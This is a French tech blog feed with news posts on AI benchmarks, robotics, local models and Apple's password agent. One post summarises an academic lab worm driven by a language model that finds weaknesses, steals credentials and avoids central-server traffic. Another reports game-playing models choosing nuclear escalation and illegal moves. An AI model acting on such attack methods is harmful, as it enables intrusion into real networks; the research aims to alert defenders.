Pour alimenter son benchmark, il colle tout un tas de modèles dans des jeux de rôle un peu tordus (45 scénarios dans sa dernière version) et c'est un autre modèle (Claude, en l'occurrence) qui joue l'examinateur. Il note alors chaque réponse sur huit dimensions, telles que l'empathie, la finesse sociale ou la capacité à poser une limite quand il faut, puis nous sort un classement façon Elo (le classement des échecs). Tout est open source, documenté dans un papier de recherche et Paech finance ce bazar avec ses propres deniers.

Et depuis 2023, c'est devenu une véritable collection de tests...

Y'a un test d'écriture créative, un autre qui regarde si le modèle vous cire les pompes au lieu de vous recadrer quand la conversation s'éternise, un sur l'humour, et même un où les IA jouent à Diplomacy pour voir lesquelles savent négocier et bluffer.

Mais mon préféré c'est le Slop Score, qui mesure à quel point un texte pue l'IA. Pour cela, il traque les mots sur-utilisés et le fameux tic du "pas X, mais Y". Bref, de quoi objectiver (un peu) ce qui rend la moitié du web illisible ces temps-ci.

Paech prévient quand même que son "juge" reste quelque chose de totalement subjectif et qu'il n'existe aucune vérité absolue sur l'intelligence émotionnelle. C'est donc plutôt à lire comme une boussole et pas comme un verdict gravé dans le marbre (ou le silicium ^^).

Toutefois, pour savoir si un modèle écrit comme un humain plutôt que comme un employé d'agence de branding, c'est plutôt pratique. Et je vous conseille d'aller fouiller un peu dans les classements, comme ça vous verrez que le meilleur en code n'est pas forcement le plus futé côté émotions...

Bref, vivement le retour de Fable 5 ^^

Qwen-Robot Suite - Alibaba donne un corps à son IA

Par : Korben ✨
18 juin 2026 à 08:56

Voici une news concernant l'intelligence artificielle, qui je pense devrait vous plaire si vous vous intéressez à la robotique. Alibaba qu'on ne présente plus, vient de sortir sa Qwen-Robot Suite, 3 modèles IA signés Tongyi Lab (les gens derrière Qwen ) imaginé pour donner un corps à l'IA. Parce qu'une machine capable de décrire votre cuisine au millimètre près mais complétement infoutue d'y attraper une tasse, voilà un peu ce qu'on a en robotique en ce moment...

Car "comprendre" le monde, ça les modèles savent faire. Mais agir dedans, c'est une autre paire de manches. Cette Qwen-Robot Suite découpe donc ça en trois briques, RobotNav pour se déplacer, RobotManip pour saisir des objets, et RobotWorld qui joue les boules de cristal en prédisant ce qui va se passer avant même que le robot ne bouge. Et si vous voulez expérimenter tout ça tout de suite, sans mettre les mains dans le cambouis, y'a même une démo Chat2Robot , où vous tapez une instruction dans votre navigateur et un bras robotique l'exécute en direct !

Mais le plus parlant dans leurs démos, c'est ce chien-robot Unitree Go2 ( bourré de failles de sécu, qui balance toutes vos données en chine ) qui, une fois lâché chez vous avec sa seule petite caméra bas de gamme, peut se balader dans toute la maison pour vous rendre tout un tas de services. Sauf qu'ici il opère dans des lieux qu'il n'a jamais vus, en suivant vos consignes vocales de pièce en pièce, et il peut même refaire tout le trajet à l'envers sur commande. C'est en tout cas, assez cool de voir ces world models enfin capables d'apprendre à résoudre des problèmes auxquels il n'a encore jamais été confronté.

L'astuce, c'est d'entraîner un seul modèle sur les données de plein de robots différents d'un coup, au lieu de repartir de zéro pour chaque machine. Du coup un geste appris sur un bras X se transfère direct sur un autre bras Y, et chaque robot profite ainsi, en quelque sorte, de l'expérience accumulée par tous les congénères du lot. Et tout ça a été nourri avec plus de 38 000 heures de données, uniquement en l'open-source, dont des vidéos de gens filmés en train de faire des trucs, et adapté pour que la machine puisse apprendre en regardant faire des humains .

Et niveau perfs, ça tape fort apparemment !

Sur les benchmarks de manipulation, RobotManip passe devant π0.5, un modèle de Physical Intelligence dont je vous avais déjà parlé, avec quand même 7 points d'avance, sur un benchmark de manipulation standard. Il finit aussi premier sur RoboChallenge, le classement généraliste du secteur. Bon, ce sont des chiffres de labo bien sûr, mais le saut par rapport à la concurrence fait mal ^^.

Ce que Qwen veut faire surtout, c'est de tout passer par le langage naturel comme ça une commande de bras, un virage de voiture, un point de navigation et compagnie... tout devient une simple phrase. Cela permet aux modèles Qwen classiques d'appeler ces briques comme des outils, et de brancher l'intelligence artificielle classique (les LLMs) directement sur l'action physique (les World Model). La presse parle déjà d'un "moment Android" pour la robotique, autrement dit un cerveau logiciel que n'importe quel fabricant de bras ou de roues pourrait embarquer sans avoir à fabriquer la quincaillerie. Ce serait fou !

Après, Chat2Robot tourne sur 50 tâches seulement et n'est pas parfait. Le tout est en test pilote chez quelques clients d'Alibaba Cloud, donc c'est pas encore pour votre robot aspirateur... Mais si le concept de robot à la maison vous intéresse, c'est une approche intéressante je trouve. Entre Physical Intelligence, Gemini Robotics chez Google et GR00T chez NVIDIA, tout le monde semble chercher le même Graal, à savoir une IA généraliste capable de piloter n'importe quel corps mécanique. Bref, Alibaba ne vend pas de robot, mais le cerveau qui va dedans, et le fait que ce soit entièrement open-source et orienté langage me fait dire qu'on risque de voir plein de projets cools et surtout accessibles se monter autour de ça.

D'ailleurs, à force de voir ces robots de service débarquer partout, je me demande quand on va leur imposer un minimum de sécurité face au public.

Source

Age of LLM - Un Age of Empires où aucun humain ne joue

Par : Korben ✨
16 juin 2026 à 10:10

Vous voulez savoir comment GPT-5.5, Claude ou Grok raisonnent quand on les met sous pression ? Hé bien filez-leur un jeu de stratégie et regardez-les se faire la guerre.

C'est tout le principe d' Age of LLM , monté par Rymentz, un lecteur du blog où deux IA s'affrontent au tour par tour, sans aucun humain aux commandes.

C'est un benchmark 1v1 dans lequel on balance deux modèles sur la même carte, on leur donne les règles et puis c'est tout, sans aucun autre conseil de stratégie. À eux alors de déduire seuls comment contrer les attaques, quand bâtir leur économie, quand lever une armée pour aller défoncer la base d'en face, quand négocier la paix et quand carrément appuyer sur le gros bouton rouge. Parce que dans ce benchmark, on peut gagner de trois façons : la conquête militaire, la victoire diplomatique, ou la bombe nucléaire.

Tout est ensuite rendu public sur le site, avec un classement ELO et le replay de chaque partie. Pour le moment, 13 modèles y sont classés, de GPT-5.5 à Grok en passant par Claude, Gemini, DeepSeek ou Qwen.

Sur les 43 parties jouées par la version 0.12.0 du moteur, 38 se terminent par un champignon atomique. C'est énorme je trouve... La diplomatie ne l'a emporté que 2 fois, et le militaire 3 fois. Mettez deux de ces modèles face à face avec une bombe à portée de main, et neuf fois sur dix, ça finit donc par appuyer sur le bouton rouge. Elles nous ressemblent tellement ces IA quand même...

Des chercheurs qui ont fait jouer des LLMs à des simulations de crise nucléaire ont relevé une tendance comparable. Quand l'option d'escalade existe, les modèles finissent le plus souvent par la prendre. C'est pour ça qui ne faut pas confier d'armes à des IA les amis... Car elles s'en serviront c'est certain !

Le jour où j'ai compris que les IA et les armes, c'était pas un bon mélange à faire

Et chacun de ces modèles a vraiment son style... Y'a qu'à regarder le classement qui est sans pitié. GPT-5.5 écrase tout le monde, 6 victoires sur 6, 100% de winrate, premier à l'ELO... mais il médite presque 5 minutes par tour avant de jouer.

À l'autre bout du tableau, on retrouve Grok 4.3 qui finit bon dernier, zéro victoire en 4 parties, mais qui joue le plus vite de tous, avec 7 secondes par tour (autant dire qu'il ne réfléchit pas trop).

Les Claude, eux, jouent propre et solide mais sans jamais dominer. Ça me rappelle l'IA qui galérait à finir un niveau de Super Mario ...

Mais le chiffre le plus parlant, c'est le taux de coups illégaux, c'est à dire le pourcentage de fois où un modèle propose une action interdite par les règles.

Par exemple, sous pression, Grok 4.3 culmine à 8,6% d'actions de triche, soit le pire du lot. Cela veut dire que sa capacité à suivre des règles sous pression est moins bonne que celle des autres modèles.

Ça résonne forcement avec ce papier d'Adrian de Wynter dont je vous parlais récemment , celui qui montrait qu'Age of Empires II a autant d'attributs "humains" que votre ChatGPT, histoire de dégonfler la hype sur les IA soi-disant conscientes.

Age of LLM, lui, prend le problème par l'autre bout, où au lieu d'analyser on fait jouer et on regarde ce qui sort. Derrière ce projet, on retrouve le même lecteur qui avait bricolé Nuclear Arms Race il y a quelques années et dont je vous avais parlé. Il a repris le concept, sauf que cette fois ce sont des IA qui jouent entre elles.

En tout cas, comme spectacle, c'est très hypnotique. Lancez un replay, vous allez voir... En regardant deux IA se bluffer et se faire exploser la tronche vous permettra d'en apprendre plus sur leur raisonnement qu'avec dix pages de benchmark.

Merci à Rymentz pour le lien et pour le projet !

CrankGPT : l'IA à manivelle qui se mérite à la force des bras

14 juin 2026 à 16:50

CrankGPT vous connaissez ? Elle fait tourner un assistant vocal complet, reconnaissance de la voix comprise, sans prise murale, sans batterie et sans serveur distant, et pour l'alimenter vous tournez une manivelle dont la résistance grimpe quand le modèle réfléchit.

Derrière, deux anciens de Google. Katrin Tomanek, informaticienne, et Alex Kauffmann, passé par le laboratoire ATAP, la division des projets un peu fous. Ils ont monté Squeez Labs ensemble.

Leur conviction tient en une phrase : des modèles d'IA minuscules, privés et spécialisés suffisent pour une bonne partie de nos usages, sans datacenter ni abonnement, à condition d'accepter du matériel modeste.

Le matériel en question ne paie vraiment pas de mine. Un Raspberry Pi 5 avec 8 Go de mémoire, ce petit ordinateur à 80 euros qu'on colle un peu partout. Un chargeur USB à manivelle de 20 watts, vendu comme matériel de survie. Et une carte de condensateurs maison qui garde 20 secondes de réserve, histoire que rien ne s'éteigne quand vos bras lâchent.

Côté logiciel, tout tourne sur le processeur du Pi, sans puce d'accélération. Moonshine transcrit votre voix. Piper répond avec la sienne. Entre les deux, un modèle de langage Liquid LFM2 de 1,2 milliard de paramètres, la même famille d'outils que ChatGPT en version lilliputienne, fabrique les réponses, et un Gemma 3 de Google s'occupe au passage de la traduction.

Le Linux embarqué, un DietPi taillé au plus court, démarre en 3 secondes. Il faut 30 secondes entre le premier tour de manivelle et la conversation. Ensuite, chaque réponse demande entre 0,8 et 2,9 secondes selon le modèle chargé.

Au repos, la machine tire 4 watts. 8 pendant la reconnaissance vocale. 15 quand le texte sort. Un cycliste entraîné tient 120 watts avec les jambes, et vous n'aurez que les biceps. Bon courage.

Le plus chouette : la résistance de la manivelle varie avec la charge de calcul, et quand l'IA réfléchit c'est physiquement plus dur à tourner. Kauffmann raconte qu'on sent littéralement l'inférence, ce moment où le modèle fabrique sa réponse. Le même résume d'ailleurs sa philosophie d'une formule : demander à Claude d'additionner deux nombres, c'est écraser une mouche avec une boule de démolition.

Squeez vise des usages très concrets. La reconnaissance vocale des personnes avec un accent prononcé. Une IA de jardinage ou de mécanique qui n'a quand même pas besoin d'un centre de données entier.

Le prototype coûte environ 300 dollars de matériel, contre 150 pour la toute première version. Les plans et schémas doivent être publiés prochainement, et l'agent vocal est déjà disponible sur GitHub si vous voulez bricoler le vôtre.

Si vous voulez mon avis, une IA qui fait transpirer à chaque question est le meilleur cours d'éducation énergétique jamais inventé.

Source : The Register

DiffusionGemma : le nouveau modèle de Google écrit son texte d'un bloc, et 4 fois plus vite

12 juin 2026 à 09:32

Plus de 1 000 tokens par seconde sur une seule carte H100, l'accélérateur que Nvidia vend aux centres de données, et environ 700 sur une RTX 5090, sa carte gaming haut de gamme. C'est le débit que Google DeepMind annonce pour DiffusionGemma, son nouveau modèle d'IA ouvert, à peu près quatre fois ce que produisent les modèles Gemma classiques de taille comparable.

Toute la différence se joue dans la façon de générer le texte. Les modèles de langage habituels sont autorégressifs : ils écrivent de gauche à droite, un token à la fois, le token étant le petit morceau de mot que manipule une IA. DiffusionGemma fait tout autrement.

Il travaille comme les générateurs d'images, qui partent d'un nuage de bruit et le débruitent petit à petit jusqu'à la photo demandée. Le modèle pose un canevas de 256 tokens fictifs, repasse dessus plusieurs fois pour affiner ses estimations, puis finalise le bloc entier d'un coup.

Sous le capot, on a un Mixture of Experts de 26 milliards de paramètres, une architecture où seule une petite partie du modèle se réveille à chaque calcul, 3,8 milliards ici. Du coup le tout tient dans 18 Go de mémoire vidéo en version compressée, soit une grosse carte graphique grand public.

L'intérêt en local, c'est que cette approche déplace le goulot d'étranglement de la bande passante mémoire, la vitesse à laquelle la carte lit ses propres données, vers le calcul pur. Dans le cloud, les serveurs mutualisent les requêtes de milliers d'utilisateurs et leurs puces tournent en permanence, alors que votre GPU à la maison passe le plus clair de son temps à attendre les données. La diffusion occupe ces cycles perdus.

Et puis il y a les tâches non linéaires, où l'ordre d'écriture ne suit pas l'ordre de lecture. Google a même affiné une version sur le Sudoku, un casse-tête réputé impossible pour les modèles classiques puisque chaque case dépend de cases pas encore écrites. DiffusionGemma, qui corrige son canevas en continu, atteint 80% de réussite en faisant tomber les étapes de calcul de 48 à 12.

Tout n'est pas rose pour autant. Dans une image, un pixel raté passe inaperçu. Un token mal prédit, lui, peut rendre un paragraphe entier incohérent et forcer à tout recommencer. Et pour une réponse de cinq mots, dégrossir un canevas complet gaspille du calcul. C'est d'ailleurs pour ça que les gros Gemini du cloud n'y passent pas.

Le modèle est expérimental, mais il sort sous licence Apache 2.0, la même que le reste de la famille Gemma 4, donc utilisable commercialement sans restriction. Les poids se téléchargent dès maintenant sur Hugging Face, la plateforme de référence des modèles ouverts, avec une optimisation menée main dans la main avec Nvidia. MLX, l'outil d'Apple pour faire tourner l'IA en local, est aussi de la partie, les Mac sont donc servis.

Si vous voulez mon avis, c'est sur ces modèles locaux que Google est le plus intéressant en ce moment, bien plus que sur Gemini.

Source : ARS Technica

Un ver informatique qui raisonne tout seul

10 juin 2026 à 17:50

La crainte n'est pas neuve. Mais cette fois la démonstration existe : une équipe réunissant l'université de Toronto, le Vector Institute, l'université de Cambridge et la division recherche de ServiceNow a dévoilé un logiciel malveillant capable de raisonner et de s'adapter seul à mesure qu'il progresse dans un réseau, là où les attaques automatisées classiques se bornaient à dérouler un scénario écrit à l'avance.

Le mot choisi par les chercheurs est parlant. Un ver, en informatique, désigne un programme qui se recopie d'une machine à l'autre sans la moindre action de l'utilisateur, à la différence du virus traditionnel qui réclame l'ouverture d'un fichier piégé pour s'activer.

La nouveauté tient au cerveau de l'engin. Plutôt qu'une liste d'instructions figées, le prototype s'appuie sur un grand modèle de langage, la même famille d'intelligence artificielle que celle qui anime les assistants conversationnels grand public, pour examiner chaque machine rencontrée, en déduire les faiblesses et décider lui-même de la marche à suivre avant de se cloner sur la cible suivante.

Les chiffres communiqués donnent la mesure de l'expérience. Dans le réseau de test bâti pour l'occasion, le ver est parvenu à compromettre près de 75 % des machines et à se répliquer sur environ deux tiers d'entre elles, récoltant à chaque intrusion les identifiants et les points faibles qui lui ouvraient l'accès suivant.

Un détail mérite qu'on s'y arrête. Plusieurs des vulnérabilités exploitées n'avaient été rendues publiques qu'au cours de l'année 2026, donc après la date d'arrêt de l'apprentissage du modèle, et le programme a tout de même reconstruit des attaques fonctionnelles à partir des seules descriptions publiées. Il a raisonné, pas récité.

S'ajoute une caractéristique qui complique sérieusement la détection : l'intelligence artificielle s'exécute localement sur les machines déjà infectées, lesquelles lui prêtent la puissance de calcul nécessaire à son raisonnement, ce qui dispense le ver de contacter en permanence un serveur central et réduit d'autant les traces susceptibles d'alerter les équipes de sécurité.

Il faut toutefois remettre les choses à leur juste place. Le travail relève de la preuve de concept menée en laboratoire, dans un environnement fermé, par des universitaires dont l'objectif assumé est d'alerter la communauté de la sécurité avant que des acteurs réellement hostiles ne franchissent le même cap, et rien de tout cela ne circule aujourd'hui dans la nature.

Reste que le signal est difficile à ignorer. Ce qui bridait jusqu'ici la plupart des attaques automatisées tenait à leur rigidité, puisqu'elles échouaient dès que la cible s'écartait du scénario prévu, et c'est exactement cette limite qu'une intelligence artificielle capable de s'adapter fait tomber.

Du coup, les défenses qui reposent sur la reconnaissance de signatures déjà connues ou sur la lenteur habituelle des attaquants à exploiter une faille récente méritent d'être repensées, ce que les chercheurs assument en publiant leurs résultats pour offrir une longueur d'avance aux défenseurs.

Bref, l'IA ne se contente plus d'écrire du code, elle commence à conduire l'attaque elle-même.

Source : Security Affairs

iOS 27 : votre iPhone va se connecter tout seul à vos comptes pour réparer vos mots de passe pourris

10 juin 2026 à 09:09

À la WWDC 2026, Apple a survolé la nouveauté en quelques secondes. Dans iOS 27, l'app Mots de passe ne se contente plus de signaler vos identifiants vulnérables, elle les remplace toute seule, en se rendant sur chaque site à votre place.

Le déroulé ressemble à de la magie un peu inquiétante. Vous validez une fois, puis Apple Intelligence, le moteur d'intelligence artificielle maison, ouvre le site visé dans Safari, saisit vos identifiants stockés dans le Trousseau iCloud, navigue jusqu'au formulaire de changement de mot de passe, en génère un nouveau long et aléatoire, puis l'enregistre, sans que vous ayez à toucher quoi que ce soit.

Apple parle d'agent. Le mot décrit une IA qui n'attend plus une question pour répondre, mais qui clique, navigue et mène une tâche complète à votre place.

Cette app Mots de passe n'a que deux ans. Apple l'a lancée en 2024 avec iOS 18 pour extraire le Trousseau iCloud, son gestionnaire de mots de passe historique, du fond des Réglages où plus personne ne l'ouvrait. Depuis, elle détecte sans peine un code trop court, un identifiant réutilisé sur trente sites ou une adresse compromise dans une fuite de données.

Mais elle restait passive. Le bouton "Modifier le mot de passe" renvoyait l'utilisateur faire la corvée lui-même, sur le site, à la main. Résultat, presque personne ne s'y collait.

Apple jure que rien ne sort du Trousseau, chiffré en AES 256 bits, un standard que l'entreprise affirme ne pas savoir déchiffrer elle-même. Pendant l'opération, une Live Activity affiche la progression dans la Dynamic Island, ce bandeau interactif en haut de l'écran des iPhone récents.

L'inconnue tient en un chiffre. Combien de sites se laisseront réellement manœuvrer par cette IA ? Entre les pages de connexion maison, les formulaires exotiques et la double authentification par SMS, beaucoup risquent de bloquer l'opération en cours de route. Un développeur a estimé le taux de réussite à 3% des comptes. Apple, plus diplomate, évoque des "comptes éligibles", ce qui revient à reconnaître la limite.

Et puis il y a l'éternel problème européen. Comme tout repose sur Apple Intelligence, dont le déploiement dans l'Union européenne traîne depuis le départ pour cause de bras de fer réglementaire, la fonction risque encore de se faire attendre de ce côté de l'Atlantique. iOS 27 tourne déjà en bêta développeurs, passe en bêta publique en juillet et sortira pour tous en septembre.

Déléguer ce genre de corvée à une IA, sur le papier, c'est futé. En pratique, lâcher un agent seul sur son compte bancaire, c'est courageux.

Source : 9to5mac

❌
❌